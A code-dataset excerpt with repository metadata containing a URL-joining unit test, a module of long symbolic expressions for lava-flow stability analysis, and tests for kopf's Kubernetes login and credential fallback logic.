psass-edfsf/centralized-pre-commit-conf
|
49ae2cf524dc90f55dfffc2c38ece3e1a2365c5f
|
[
"MIT"
] | 1
|
2020-09-02T15:51:38.000Z
|
2020-09-02T15:51:38.000Z
|
tests/test_get_url_from_args.py
|
psass-edfsf/centralized-pre-commit-conf
|
49ae2cf524dc90f55dfffc2c38ece3e1a2365c5f
|
[
"MIT"
] | 1
|
2020-07-22T08:03:45.000Z
|
2020-07-22T08:03:45.000Z
|
import unittest
from centralized_pre_commit_conf.parse_args import get_url_from_args
class TestGetUrlFromArgs(unittest.TestCase):
def test_all_args(self):
self.assertEqual(get_url_from_args("http://a.net", "master", "path"), "http://a.net/master/path")
self.assertEqual(get_url_from_args("http://a.net/", "master", "path"), "http://a.net/master/path")
self.assertEqual(get_url_from_args("http://a.net", "master", "path/"), "http://a.net/master/path")
self.assertEqual(get_url_from_args("http://a.net", "master", ""), "http://a.net/master")
self.assertEqual(get_url_from_args("http://a.net", "master", "/"), "http://a.net/master")
self.assertEqual(get_url_from_args("http://a.net", "", ""), "http://a.net")
self.assertEqual(get_url_from_args("http://a.net", "", "/"), "http://a.net")
self.assertEqual(get_url_from_args("http://a.net", "", "path"), "http://a.net/path")
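The assertions above pin down how get_url_from_args joins its pieces: trailing slashes are stripped and empty branch or path segments are skipped. As a hedged sketch only, an implementation consistent with those assertions could look like this; the real function in centralized_pre_commit_conf.parse_args may differ.

# Hedged sketch consistent with the assertions above; the real
# centralized_pre_commit_conf.parse_args.get_url_from_args may differ.
def get_url_from_args(url, branch, path):
    parts = [url.rstrip('/')]
    for part in (branch, path):
        part = part.strip('/')
        if part:
            parts.append(part)
    return '/'.join(parts)

assert get_url_from_args("http://a.net/", "master", "path/") == "http://a.net/master/path"
assert get_url_from_args("http://a.net", "", "/") == "http://a.net"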
| 58.6875
| 106
| 0.652822
| 137
| 939
| 4.233577
| 0.175182
| 0.137931
| 0.22069
| 0.241379
| 0.751724
| 0.751724
| 0.751724
| 0.751724
| 0.751724
| 0.751724
| 0
| 0
| 0.120341
| 939
| 15
| 107
| 62.6
| 0.702179
| 0
| 0
| 0
| 0
| 0
| 0.316294
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0.083333
| false
| 0
| 0.166667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0468d7060893aed31e9b99d015c9235a59e51d6d
| 12,969
|
py
|
Python
|
utils.py
|
cculha4/pahoehoe2aa
|
a9c803f2aaa9604ad17b00fd8529f55cd68e4ff6
|
[
"MIT"
] | null | null | null |
utils.py
|
cculha4/pahoehoe2aa
|
a9c803f2aaa9604ad17b00fd8529f55cd68e4ff6
|
[
"MIT"
] | null | null | null |
utils.py
|
cculha4/pahoehoe2aa
|
a9c803f2aaa9604ad17b00fd8529f55cd68e4ff6
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
import matplotlib.pyplot as plt
import math
from itertools import cycle
"""
Taken from Matlab function solutions that can be found within the 'Free Slip LSA' directory.
"""
def no_slip_J(**params):
Ku_p, n, mu_u, m, U_p, n, du, F, r, Kl_p, m, mu_l = \
(params["Ku_p"], params["n"], params["mu_u"], params["m"], params["U_p"],
params["n"], params["du"], params["F"], params["r"], params["Kl_p"],
params["m"], params["mu_l"])
return -(560*F**2*U_p**2*mu_l**2*mu_u**2*n**14 + 56*Kl_p**2*du**4*m**4*mu_u**2*n**8 + 28*Kl_p**2*du**4*m**5*mu_u**2*n**7 + 7*Kl_p**2*du**4*m**6*mu_u**2*n**6 + 56*Kl_p**2*du**4*m**3*mu_u**2*n**10 + 252*Kl_p**2*du**4*m**4*mu_u**2*n**9 + 84*Kl_p**2*du**4*m**5*mu_u**2*n**8 - 7*Kl_p**2*du**4*m**7*mu_u**2*n**6 - 672*Kl_p**2*du**4*m**2*mu_u**2*n**12 - 1372*Kl_p**2*du**4*m**3*mu_u**2*n**11 - 854*Kl_p**2*du**4*m**4*mu_u**2*n**10 - 336*Kl_p**2*du**4*m**5*mu_u**2*n**9 - 140*Kl_p**2*du**4*m**6*mu_u**2*n**8 - 28*Kl_p**2*du**4*m**7*mu_u**2*n**7 - 1372*Kl_p**2*du**4*m**2*mu_u**2*n**13 - 1988*Kl_p**2*du**4*m**3*mu_u**2*n**12 - 224*Kl_p**2*du**4*m**4*mu_u**2*n**11 + 686*Kl_p**2*du**4*m**5*mu_u**2*n**10 + 84*Kl_p**2*du**4*m**6*mu_u**2*n**9 - 945*Kl_p**2*du**4*m**2*mu_u**2*n**14 - 336*Kl_p**2*du**4*m**3*mu_u**2*n**13 + 1708*Kl_p**2*du**4*m**4*mu_u**2*n**12 + 1596*Kl_p**2*du**4*m**5*mu_u**2*n**11 + 112*Kl_p**2*du**4*m**6*mu_u**2*n**10 - 224*Kl_p**2*du**4*m**2*mu_u**2*n**15 + 553*Kl_p**2*du**4*m**3*mu_u**2*n**14 + 1484*Kl_p**2*du**4*m**4*mu_u**2*n**13 + 952*Kl_p**2*du**4*m**5*mu_u**2*n**12 + 224*Kl_p**2*du**4*m**3*mu_u**2*n**15 + 392*Kl_p**2*du**4*m**4*mu_u**2*n**14 + 224*Kl_p**2*du**4*m**5*mu_u**2*n**13 + 32*Ku_p**2*du**4*m**4*mu_l**2*n**4 - 2*Ku_p**2*du**4*m**5*mu_l**2*n**3 + Ku_p**2*du**4*m**6*mu_l**2*n**2 + 72*Ku_p**2*du**4*m**3*mu_l**2*n**6 + 148*Ku_p**2*du**4*m**4*mu_l**2*n**5 - 34*Ku_p**2*du**4*m**5*mu_l**2*n**4 + 8*Ku_p**2*du**4*m**6*mu_l**2*n**3 - Ku_p**2*du**4*m**7*mu_l**2*n**2 - 216*Ku_p**2*du**4*m**2*mu_l**2*n**8 - 192*Ku_p**2*du**4*m**3*mu_l**2*n**7 - 154*Ku_p**2*du**4*m**4*mu_l**2*n**6 - 240*Ku_p**2*du**4*m**5*mu_l**2*n**5 + 2*Ku_p**2*du**4*m**6*mu_l**2*n**4 - 6*Ku_p**2*du**4*m**7*mu_l**2*n**3 - 292*Ku_p**2*du**4*m**2*mu_l**2*n**9 + 64*Ku_p**2*du**4*m**3*mu_l**2*n**8 + 48*Ku_p**2*du**4*m**4*mu_l**2*n**7 - 6*Ku_p**2*du**4*m**5*mu_l**2*n**6 + 92*Ku_p**2*du**4*m**6*mu_l**2*n**5 + 361*Ku_p**2*du**4*m**2*mu_l**2*n**10 + 1040*Ku_p**2*du**4*m**3*mu_l**2*n**9 + 464*Ku_p**2*du**4*m**4*mu_l**2*n**8 + 144*Ku_p**2*du**4*m**5*mu_l**2*n**7 + 88*Ku_p**2*du**4*m**6*mu_l**2*n**6 + 264*Ku_p**2*du**4*m**2*mu_l**2*n**11 + 199*Ku_p**2*du**4*m**3*mu_l**2*n**10 - 524*Ku_p**2*du**4*m**4*mu_l**2*n**9 - 312*Ku_p**2*du**4*m**5*mu_l**2*n**8 - 98*Ku_p**2*du**4*m**2*mu_l**2*n**12 - 378*Ku_p**2*du**4*m**3*mu_l**2*n**11 - 560*Ku_p**2*du**4*m**4*mu_l**2*n**10 - 224*Ku_p**2*du**4*m**5*mu_l**2*n**9 + 114*Ku_p**2*du**4*m*mu_l**2*n**11 + 98*Ku_p**2*du**4*m*mu_l**2*n**12 - 6*Kl_p**2*du**4*mu_u**2*n**17*r - Kl_p**2*du**4*mu_u**2*n**18*r - 28*Ku_p**2*du**4*mu_l**2*n**13*r - 7*Ku_p**2*du**4*mu_l**2*n**14*r + 88*Kl_p**2*du**4*m*mu_u**2*n**14*r + 92*Kl_p**2*du**4*m*mu_u**2*n**15*r + 2*Kl_p**2*du**4*m*mu_u**2*n**16*r + 8*Kl_p**2*du**4*m*mu_u**2*n**17*r + Kl_p**2*du**4*m*mu_u**2*n**18*r + 112*Ku_p**2*du**4*m*mu_l**2*n**10*r + 84*Ku_p**2*du**4*m*mu_l**2*n**11*r - 140*Ku_p**2*du**4*m*mu_l**2*n**12*r + 7*Ku_p**2*du**4*m*mu_l**2*n**14*r + 4480*F**2*U_p**2*m*mu_l**2*mu_u**2*n**11 + 6720*F**2*U_p**2*m*mu_l**2*mu_u**2*n**12 + 6160*F**2*U_p**2*m*mu_l**2*mu_u**2*n**13 - 224*Kl_p**2*du**4*m**2*mu_u**2*n**11*r - 560*Kl_p**2*du**4*m**3*mu_u**2*n**10*r - 378*Kl_p**2*du**4*m**4*mu_u**2*n**9*r - 98*Kl_p**2*du**4*m**5*mu_u**2*n**8*r - 312*Kl_p**2*du**4*m**2*mu_u**2*n**12*r - 524*Kl_p**2*du**4*m**3*mu_u**2*n**11*r + 199*Kl_p**2*du**4*m**4*mu_u**2*n**10*r + 264*Kl_p**2*du**4*m**5*mu_u**2*n**9*r + 98*Kl_p**2*du**4*m**6*mu_u**2*n**8*r + 144*Kl_p**2*du**4*m**2*mu_u**2*n**13*r + 464*Kl_p**2*du**4*m**3*mu_u**2*n**12*r + 1040*Kl_p**2*du**4*m**4*mu_u**2*n**11*r + 
361*Kl_p**2*du**4*m**5*mu_u**2*n**10*r + 114*Kl_p**2*du**4*m**6*mu_u**2*n**9*r - 6*Kl_p**2*du**4*m**2*mu_u**2*n**14*r + 48*Kl_p**2*du**4*m**3*mu_u**2*n**13*r + 64*Kl_p**2*du**4*m**4*mu_u**2*n**12*r - 292*Kl_p**2*du**4*m**5*mu_u**2*n**11*r - 240*Kl_p**2*du**4*m**2*mu_u**2*n**15*r - 154*Kl_p**2*du**4*m**3*mu_u**2*n**14*r - 192*Kl_p**2*du**4*m**4*mu_u**2*n**13*r - 216*Kl_p**2*du**4*m**5*mu_u**2*n**12*r - 34*Kl_p**2*du**4*m**2*mu_u**2*n**16*r + 148*Kl_p**2*du**4*m**3*mu_u**2*n**15*r + 72*Kl_p**2*du**4*m**4*mu_u**2*n**14*r - 2*Kl_p**2*du**4*m**2*mu_u**2*n**17*r + 32*Kl_p**2*du**4*m**3*mu_u**2*n**16*r + 224*Ku_p**2*du**4*m**2*mu_l**2*n**7*r + 392*Ku_p**2*du**4*m**3*mu_l**2*n**6*r + 224*Ku_p**2*du**4*m**4*mu_l**2*n**5*r + 952*Ku_p**2*du**4*m**2*mu_l**2*n**8*r + 1484*Ku_p**2*du**4*m**3*mu_l**2*n**7*r + 553*Ku_p**2*du**4*m**4*mu_l**2*n**6*r - 224*Ku_p**2*du**4*m**5*mu_l**2*n**5*r + 1596*Ku_p**2*du**4*m**2*mu_l**2*n**9*r + 1708*Ku_p**2*du**4*m**3*mu_l**2*n**8*r - 336*Ku_p**2*du**4*m**4*mu_l**2*n**7*r - 945*Ku_p**2*du**4*m**5*mu_l**2*n**6*r + 686*Ku_p**2*du**4*m**2*mu_l**2*n**10*r - 224*Ku_p**2*du**4*m**3*mu_l**2*n**9*r - 1988*Ku_p**2*du**4*m**4*mu_l**2*n**8*r - 1372*Ku_p**2*du**4*m**5*mu_l**2*n**7*r - 336*Ku_p**2*du**4*m**2*mu_l**2*n**11*r - 854*Ku_p**2*du**4*m**3*mu_l**2*n**10*r - 1372*Ku_p**2*du**4*m**4*mu_l**2*n**9*r - 672*Ku_p**2*du**4*m**5*mu_l**2*n**8*r + 84*Ku_p**2*du**4*m**2*mu_l**2*n**12*r + 252*Ku_p**2*du**4*m**3*mu_l**2*n**11*r + 56*Ku_p**2*du**4*m**4*mu_l**2*n**10*r + 28*Ku_p**2*du**4*m**2*mu_l**2*n**13*r + 56*Ku_p**2*du**4*m**3*mu_l**2*n**12*r + 8960*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**8 + 31360*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**7 + 40880*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**6 + 24080*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**5 + 6160*F**2*U_p**2*m**6*mu_l**2*mu_u**2*n**4 + 560*F**2*U_p**2*m**7*mu_l**2*mu_u**2*n**3 + 26880*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**9 + 87360*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**8 + 100800*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**7 + 47040*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**6 + 6720*F**2*U_p**2*m**6*mu_l**2*mu_u**2*n**5 + 52640*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**10 + 135520*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**9 + 135520*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**8 + 52640*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**7 + 4480*F**2*U_p**2*m**6*mu_l**2*mu_u**2*n**6 + 47040*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**11 + 100800*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**10 + 87360*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**9 + 26880*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**8 + 24080*F**2*U_p**2*m**2*mu_l**2*mu_u**2*n**12 + 40880*F**2*U_p**2*m**3*mu_l**2*mu_u**2*n**11 + 31360*F**2*U_p**2*m**4*mu_l**2*mu_u**2*n**10 + 8960*F**2*U_p**2*m**5*mu_l**2*mu_u**2*n**9 - 88*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**6 - 26*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**5 - 8*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**4 - 128*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**8 - 400*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**7 - 50*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**6 - 8*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**5 + 8*Kl_p*Ku_p*du**4*m**7*mu_l*mu_u*n**4 + 888*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**10 + 1564*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**9 + 1008*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**8 + 576*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**7 + 138*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**6 + 34*Kl_p*Ku_p*du**4*m**7*mu_l*mu_u*n**5 + 1664*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**11 + 1924*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**10 + 176*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**9 - 680*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**8 - 176*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**7 + 584*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**12 - 
704*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**11 - 2172*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**10 - 1740*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**9 - 200*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**8 - 40*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**13 - 752*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**12 - 960*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**11 - 640*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**10 + 98*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**14 + 154*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**13 + 168*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**12 - 114*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**13 - 98*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**14 + 34*Kl_p*Ku_p*du**4*mu_l*mu_u*n**15*r + 8*Kl_p*Ku_p*du**4*mu_l*mu_u*n**16*r - 200*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**12*r - 176*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**13*r + 138*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**14*r - 8*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**15*r - 8*Kl_p*Ku_p*du**4*m*mu_l*mu_u*n**16*r + 168*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**8*r + 154*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**7*r + 98*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**6*r - 640*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**10*r - 960*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**9*r - 752*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**8*r - 40*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**7*r - 98*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**6*r - 1740*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**11*r - 2172*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**10*r - 704*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**9*r + 584*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**8*r - 114*Kl_p*Ku_p*du**4*m**6*mu_l*mu_u*n**7*r - 680*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**12*r + 176*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**11*r + 1924*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**10*r + 1664*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**9*r + 576*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**13*r + 1008*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**12*r + 1564*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**11*r + 888*Kl_p*Ku_p*du**4*m**5*mu_l*mu_u*n**10*r - 50*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**14*r - 400*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**13*r - 128*Kl_p*Ku_p*du**4*m**4*mu_l*mu_u*n**12*r - 26*Kl_p*Ku_p*du**4*m**2*mu_l*mu_u*n**15*r - 88*Kl_p*Ku_p*du**4*m**3*mu_l*mu_u*n**14*r)/(1680*U_p**2*mu_l**2*mu_u**2*(m + n)**2*(m**2 + 4*m*n**3 + 6*m*n**2 + 4*m*n + n**4)**3)
def free_surface_J(**params):
Ku_p, n, mu_u, m, U_p, n, du, F, r, Kl_p, m, mu_l = \
(params["Ku_p"], params["n"], params["mu_u"], params["m"], params["U_p"],
params["n"], params["du"], params["F"], params["r"], params["Kl_p"],
params["m"], params["mu_l"])
return -(700*Ku_p**2*du**4*m*mu_l*n**9 - 1260*Ku_p**2*du**4*mu_l*n**9 - 420*Ku_p**2*du**4*mu_l*n**10 - 2520*Ku_p**2*du**4*m*mu_l*n**7 - 1890*Ku_p**2*du**4*m*mu_l*n**8 - 945*Ku_p**2*du**4*mu_l*n**8 + 560*Ku_p**2*du**4*m*mu_l*n**10 + 378*Ku_p**2*du**4*mu_l*n**7*r + 1071*Ku_p**2*du**4*mu_l*n**8*r + 987*Ku_p**2*du**4*mu_l*n**9*r + 273*Ku_p**2*du**4*mu_l*n**10*r - 21*Ku_p**2*du**4*mu_l*n**11*r + 252*Ku_p**2*du**4*m**2*mu_l*n**4 + 96*Ku_p**2*du**4*m**3*mu_l*n**3 + 32*Ku_p**2*du**4*m**4*mu_l*n**2 + 756*Ku_p**2*du**4*m**2*mu_l*n**5 + 20*Ku_p**2*du**4*m**3*mu_l*n**4 - 32*Ku_p**2*du**4*m**5*mu_l*n**2 - 1232*Ku_p**2*du**4*m**2*mu_l*n**6 - 1220*Ku_p**2*du**4*m**3*mu_l*n**5 - 272*Ku_p**2*du**4*m**4*mu_l*n**4 - 96*Ku_p**2*du**4*m**5*mu_l*n**3 + 1288*Ku_p**2*du**4*m**2*mu_l*n**7 + 880*Ku_p**2*du**4*m**3*mu_l*n**6 + 464*Ku_p**2*du**4*m**4*mu_l*n**5 + 3059*Ku_p**2*du**4*m**2*mu_l*n**8 + 1232*Ku_p**2*du**4*m**3*mu_l*n**7 + 352*Ku_p**2*du**4*m**4*mu_l*n**6 + 784*Ku_p**2*du**4*m**2*mu_l*n**9 - 224*Ku_p**2*du**4*m**3*mu_l*n**8 - 140*Ku_p**2*du**4*m**2*mu_l*n**10 - 224*Ku_p**2*du**4*m**3*mu_l*n**9 + 672*Ku_p**2*du**4*m**2*mu_l*n**5*r + 1183*Ku_p**2*du**4*m**2*mu_l*n**6*r - 672*Ku_p**2*du**4*m**3*mu_l*n**5*r - 609*Ku_p**2*du**4*m**2*mu_l*n**7*r - 2065*Ku_p**2*du**4*m**3*mu_l*n**6*r - 1911*Ku_p**2*du**4*m**2*mu_l*n**8*r - 2058*Ku_p**2*du**4*m**3*mu_l*n**7*r - 763*Ku_p**2*du**4*m**2*mu_l*n**9*r - 672*Ku_p**2*du**4*m**3*mu_l*n**8*r + 42*Ku_p**2*du**4*m**2*mu_l*n**10*r + 3780*F**2*U_p**2*m**2*mu_l*mu_u**2*n**6 + 7560*F**2*U_p**2*m**3*mu_l*mu_u**2*n**5 + 3780*F**2*U_p**2*m**4*mu_l*mu_u**2*n**4 + 560*F**2*U_p**2*m**5*mu_l*mu_u**2*n**3 + 7560*F**2*U_p**2*m**2*mu_l*mu_u**2*n**7 + 12600*F**2*U_p**2*m**3*mu_l*mu_u**2*n**6 + 3360*F**2*U_p**2*m**4*mu_l*mu_u**2*n**5 + 6300*F**2*U_p**2*m**2*mu_l*mu_u**2*n**8 + 9240*F**2*U_p**2*m**3*mu_l*mu_u**2*n**7 + 1120*F**2*U_p**2*m**4*mu_l*mu_u**2*n**6 + 2520*F**2*U_p**2*m**2*mu_l*mu_u**2*n**9 + 3360*F**2*U_p**2*m**3*mu_l*mu_u**2*n**8 + 420*F**2*U_p**2*m**2*mu_l*mu_u**2*n**10 + 560*F**2*U_p**2*m**3*mu_l*mu_u**2*n**9 + 882*Ku_p**2*du**4*m*mu_l*n**6*r + 2289*Ku_p**2*du**4*m*mu_l*n**7*r + 1512*Ku_p**2*du**4*m*mu_l*n**8*r - 224*Ku_p**2*du**4*m*mu_l*n**9*r - 315*Ku_p**2*du**4*m*mu_l*n**10*r + 21*Ku_p**2*du**4*m*mu_l*n**11*r + 567*Kl_p*Ku_p*du**4*m**2*mu_u*n**7*r + 147*Kl_p*Ku_p*du**4*m**3*mu_u*n**6*r + 516*Kl_p*Ku_p*du**4*m**2*mu_u*n**8*r - 453*Kl_p*Ku_p*du**4*m**3*mu_u*n**7*r - 147*Kl_p*Ku_p*du**4*m**4*mu_u*n**6*r - 212*Kl_p*Ku_p*du**4*m**2*mu_u*n**9*r - 894*Kl_p*Ku_p*du**4*m**3*mu_u*n**8*r - 114*Kl_p*Ku_p*du**4*m**4*mu_u*n**7*r - 375*Kl_p*Ku_p*du**4*m**2*mu_u*n**10*r - 499*Kl_p*Ku_p*du**4*m**3*mu_u*n**9*r - 141*Kl_p*Ku_p*du**4*m**2*mu_u*n**11*r - 114*Kl_p*Ku_p*du**4*m**3*mu_u*n**10*r - 10*Kl_p*Ku_p*du**4*m**2*mu_u*n**12*r + 378*Kl_p*Ku_p*du**4*m*mu_u*n**8*r + 711*Kl_p*Ku_p*du**4*m*mu_u*n**9*r + 489*Kl_p*Ku_p*du**4*m*mu_u*n**10*r + 141*Kl_p*Ku_p*du**4*m*mu_u*n**11*r + 10*Kl_p*Ku_p*du**4*m*mu_u*n**12*r)/(1680*U_p**2*m**3*mu_l*mu_u**2*(n**3 + 3*n**2 + 3*n + m)**3)
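Both functions above take all of their physical parameters as keyword arguments and return a single scalar, so they can be evaluated pointwise. A hedged call sketch follows; the numerical values are placeholders with no physical significance.

# Hedged usage sketch for the two functions above; the parameter values are
# placeholders, chosen only so the denominators are non-zero.
params = dict(Ku_p=1.0, Kl_p=1.0, mu_u=1.0, mu_l=10.0,
              U_p=1.0, du=0.5, F=0.1, r=0.9, m=2.0, n=3.0)
print(no_slip_J(**params), free_surface_J(**params))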
| 432.3
| 9,155
| 0.560105
| 4,373
| 12,969
| 1.472216
| 0.043677
| 0.121156
| 0.152843
| 0.136688
| 0.911774
| 0.899037
| 0.88366
| 0.83908
| 0.798695
| 0.773066
| 0
| 0.19183
| 0.06184
| 12,969
| 29
| 9,156
| 447.206897
| 0.337306
| 0
| 0
| 0.470588
| 0
| 0
| 0.004196
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| true
| 0
| 0.294118
| 0
| 0.529412
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
04768c36685ddc2a30159cc050b8702f52cc0819
| 10,032
|
py
|
Python
|
tests/cli/test_login.py
|
yashbhutwala/kopf
|
4ad77dae699d8516ee7c189b11c6cedbe9224975
|
[
"MIT"
] | 1
|
2019-10-22T19:11:15.000Z
|
2019-10-22T19:11:15.000Z
|
tests/cli/test_login.py
|
yashbhutwala/kopf
|
4ad77dae699d8516ee7c189b11c6cedbe9224975
|
[
"MIT"
] | null | null | null |
tests/cli/test_login.py
|
yashbhutwala/kopf
|
4ad77dae699d8516ee7c189b11c6cedbe9224975
|
[
"MIT"
] | null | null | null |
"""
Remember: We do not test the clients, we assume they work when used properly.
We test our own functions here, and check if the clients were called.
"""
import pytest
import requests
import urllib3
from kopf.clients.auth import login, LoginError, AccessError
RESPONSE_401 = requests.Response()
RESPONSE_401.status_code = 401
@pytest.fixture(autouse=True)
def _auto_clean_kubernetes_client(clean_kubernetes_client):
pass
def test_kubernetes_uninstalled_has_effect(no_kubernetes):
with pytest.raises(ImportError):
import kubernetes
#
# Tests via the direct function invocation.
#
def test_direct_auth_works_incluster_without_client(login_mocks, no_kubernetes):
login()
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
def test_direct_auth_works_viaconfig_without_client(login_mocks, no_kubernetes):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login()
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
def test_direct_auth_works_incluster_with_client(login_mocks, kubernetes):
login()
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
def test_direct_auth_works_viaconfig_with_client(login_mocks, kubernetes):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login_mocks.client_in_cluster.side_effect = kubernetes.config.ConfigException
login()
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
assert login_mocks.client_in_cluster.called
assert login_mocks.client_from_file.called
def test_direct_auth_fails_on_errors_in_pykube(login_mocks, any_kubernetes):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
login_mocks.pykube_from_file.side_effect = FileNotFoundError
with pytest.raises(LoginError):
login()
assert login_mocks.pykube_in_cluster.called
assert login_mocks.pykube_from_file.called
def test_direct_auth_fails_on_errors_in_client(login_mocks, kubernetes):
login_mocks.client_in_cluster.side_effect = kubernetes.config.ConfigException
login_mocks.client_from_file.side_effect = kubernetes.config.ConfigException
with pytest.raises(LoginError):
login()
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.client_in_cluster.called
assert login_mocks.client_from_file.called
def test_direct_check_fails_on_tcp_error_in_pykube(login_mocks, any_kubernetes):
login_mocks.pykube_checker.side_effect = requests.exceptions.ConnectionError()
with pytest.raises(AccessError):
login(verify=True)
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
def test_direct_check_fails_on_401_error_in_pykube(login_mocks, any_kubernetes):
login_mocks.pykube_checker.side_effect = requests.exceptions.HTTPError(response=RESPONSE_401)
with pytest.raises(AccessError):
login(verify=True)
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
def test_direct_check_fails_on_tcp_error_in_client(login_mocks, kubernetes):
login_mocks.client_checker.side_effect = urllib3.exceptions.HTTPError()
with pytest.raises(AccessError):
login(verify=True)
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called
def test_direct_check_fails_on_401_error_in_client(login_mocks, kubernetes):
login_mocks.client_checker.side_effect = kubernetes.client.rest.ApiException(status=401)
with pytest.raises(AccessError):
login(verify=True)
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
assert login_mocks.pykube_checker.called
assert login_mocks.client_in_cluster.called
assert not login_mocks.client_from_file.called
assert login_mocks.client_checker.called
#
# The same tests, but via the CLI command run.
#
def test_clirun_auth_works_incluster_without_client(login_mocks, no_kubernetes,
invoke, preload, real_run):
result = invoke(['run'])
assert result.exit_code == 0
assert login_mocks.pykube_in_cluster.called
assert not login_mocks.pykube_from_file.called
def test_clirun_auth_works_viaconfig_without_client(login_mocks, no_kubernetes,
invoke, preload, real_run):
login_mocks.pykube_in_cluster.side_effect = FileNotFoundError
result = invoke(['run'])
assert result.exit_code == 0
